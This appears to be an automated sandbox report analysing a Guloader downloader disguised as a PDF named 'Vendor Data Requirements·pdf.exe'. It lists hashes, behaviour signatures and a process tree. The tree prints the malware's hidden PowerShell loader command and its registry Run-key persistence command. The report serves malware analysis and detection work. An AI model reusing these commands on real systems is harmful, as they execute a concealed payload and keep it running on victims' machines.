Analysis
-
max time kernel
95s -
max time network
101s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 09:49
Static task
static1
Behavioral task
behavioral1
Sample
Vendor Data Requirements·pdf.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Vendor Data Requirements·pdf.exe
Resource
win10v2004-20240704-en
General
-
Target
Vendor Data Requirements·pdf.exe
-
Size
401KB
-
MD5
f1043033237fa935ef9af72415e657a1
-
SHA1
b1ce2973b99811fe469ae6b4c450e97d4d4f4a20
-
SHA256
a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
-
SHA512
1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b
-
SSDEEP
6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\\Chet\\').Ruelike;%pantstnings% ($Uselessness)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2752 wab.exe 2752 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2380 powershell.exe 2752 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2380 set thread context of 2752 2380 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2380 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
Vendor Data Requirements·pdf.exepowershell.exewab.execmd.exedescription pid process target process PID 2488 wrote to memory of 2380 2488 Vendor Data Requirements·pdf.exe powershell.exe PID 2488 wrote to memory of 2380 2488 Vendor Data Requirements·pdf.exe powershell.exe PID 2488 wrote to memory of 2380 2488 Vendor Data Requirements·pdf.exe powershell.exe PID 2488 wrote to memory of 2380 2488 Vendor Data Requirements·pdf.exe powershell.exe PID 2380 wrote to memory of 2752 2380 powershell.exe wab.exe PID 2380 wrote to memory of 2752 2380 powershell.exe wab.exe PID 2380 wrote to memory of 2752 2380 powershell.exe wab.exe PID 2380 wrote to memory of 2752 2380 powershell.exe wab.exe PID 2380 wrote to memory of 2752 2380 powershell.exe wab.exe PID 2380 wrote to memory of 2752 2380 powershell.exe wab.exe PID 2752 wrote to memory of 1720 2752 wab.exe cmd.exe PID 2752 wrote to memory of 1720 2752 wab.exe cmd.exe PID 2752 wrote to memory of 1720 2752 wab.exe cmd.exe PID 2752 wrote to memory of 1720 2752 wab.exe cmd.exe PID 1720 wrote to memory of 1912 1720 cmd.exe reg.exe PID 1720 wrote to memory of 1912 1720 cmd.exe reg.exe PID 1720 wrote to memory of 1912 1720 cmd.exe reg.exe PID 1720 wrote to memory of 1912 1720 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"4⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:1912
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
350KB
MD5be381f7baf52513e52dfed9361a6dc69
SHA1a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a
SHA256caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79
SHA512c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a
-
Filesize
69KB
MD58172795f7c8cfb7cc597e879d2b0b468
SHA1811797a9309a1bc3429f3bc7735eb6af1a7c80dc
SHA2565339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
SHA5129718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322